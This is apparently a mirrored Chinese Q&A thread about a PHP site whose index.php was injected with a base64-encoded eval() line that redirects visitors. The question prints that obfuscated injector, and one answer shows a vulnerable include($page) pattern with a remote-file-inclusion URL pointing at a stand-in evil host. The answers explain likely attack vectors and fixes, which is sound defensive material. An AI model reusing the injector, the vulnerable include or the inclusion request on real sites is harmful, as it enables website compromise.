PHP:我被黑了

时间:2010-05-12 18:14:58

标签: php xss

我刚检查了我的网站,它突然跳到我这个网站:

xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx

我发现在我的index.php文件的第一行中,它看起来像这样:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/*

Snip

*/DkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

如何阻止这种情况?谢谢!

更新 这是什么样的攻击?这真的是xss吗?没有人真正知道我的ftp密码。

8 个答案:

答案 0 :(得分:10)

有人可以访问您服务器上的php文件(不通过xss或sql-injection)。如果这是一个共享服务器,很可能整个服务器都以某种方式受到损害。你可以删除php文件顶部的垃圾,并将它们设为只读。但是,由于我猜这是一个共享服务器,如果您的Web主机没有解决首先允许这样做的安全漏洞,那可能还不够。请与您的托管服务提供商联系(我个人只是转移到新的提供商,这是一个很好的迹象,表明这些人无望。)

答案 1 :(得分:3)

如果你有open_wrappers = on,你在网站的某个地方使用这样的东西

http://domain.tld/index.php?page=somenameofpage

index.php(或包含文件)中的某处

<?php

include($page . '.php');

?>

然后有人可能会通过请求

来破坏您的网站 
http://domain.tld/index.php?page=http://evil.me/evilcode.txt?

(页面的值应该被urlencoded工作 - 我很懒,所以没有urlencode它。 注意?最后..

你现在实际包括的是

http://evil.me/evilcode.txt?.php

- evilcode.txt - 

<?php

echo 'some evil code huh!';

这个vil执行evilcode.txt中的php代码

一个quickfix就是添加一个。到包含的路径 - 像这样

include('./' . $page . '.php');

我很难学到这一点。成为使用此方法进行导航的现有网站的管理员。花了我几个月才弄明白,尽管黑客没有替换任何代码 - 他只是在一些子文件夹中添加了文件。是的,他在用户AntiVir选择的.js和.css文件中添加了一些后门。

答案 2 :(得分:2)

保护您的服务器,尝试联系相关人员,服务器似乎已被盗用。

答案 3 :(得分:1)

删除代码行?

这是对您的服务器的攻击,允许攻击者更改服务器文件。这可以通过文件夹权限(拥有777权限),或者如果您允许脚本更改服务器上的其他脚本。

您可能希望查看文件夹权限。

答案 4 :(得分:1)

  

这是什么类型的攻击?这真的是xss吗?没有人真正知道我的ftp密码。

这种攻击有几种载体:

软件漏洞。这可能包括过时的PHP,MySQL,Apache或其他任何正在运行的东西。整个服务器可能已被编译。

脚本漏洞。漏洞,通常使用广泛使用的PHP应用程序来上传和执行命令。一个常见的是在照片库软件中被欺骗上传重命名的php文件,允许扩展在服务器上从jpg重命名回原始的php,然后运行,允许脚本允许的任何操作(通常是PHP管理员) / root kit以这种方式上传,使攻击者能够自由上传和更改文件)

FTP暴力攻击。通常,您的服务器应配置为能够阻止重复登录尝试失败的IP阻止地址。

用户感染。一个相对较新的攻击媒介,一个特洛伊木马(迄今为止大多数使用Adobe PDF Reader插件中的漏洞,因为它在FireFox中有效,但任何允许代码执行的浏览器漏洞都可以使用)将木马安装到通过的用户计算机上。该木马在用户计算机上搜索Filezilla和Dreamweaver等常见FTP程序,查找已保存的密码。一旦找到FTP登录,它就会从用户自己的计算机访问该站点,并尝试修改已知的文件类型(htm,php,asp等),插入自己的代码(大多数搜索HEAD标签并在此之后插入) - 最初感染用户计算机的相同代码。一旦完成,它可以像任何其他木马一样工作(安装广告软件,或保持隐藏,并使用户计算机成为僵尸网络的一部分)。

答案 5 :(得分:1)

我们遇到了同样的问题。真的很惭愧承认,但它发生在我们身上,因为用户能够上传任何扩展名的文件并在服务器上运行它们。所以,有些用户上传了php脚本并执行了它。 : - )

我们通过在上传的文件上设置过滤器和只读属性来解决问题。

答案 6 :(得分:0)

只需删除此行,然后修补您的服务器。很可能你被后门感染了。

答案 7 :(得分:0)

大多数人通过首先删除病毒代码来阻止代码注入攻击,然后在查找攻击用于写入PHP文件的漏洞时,只读取所有PHP文件。

相关问题
最新问题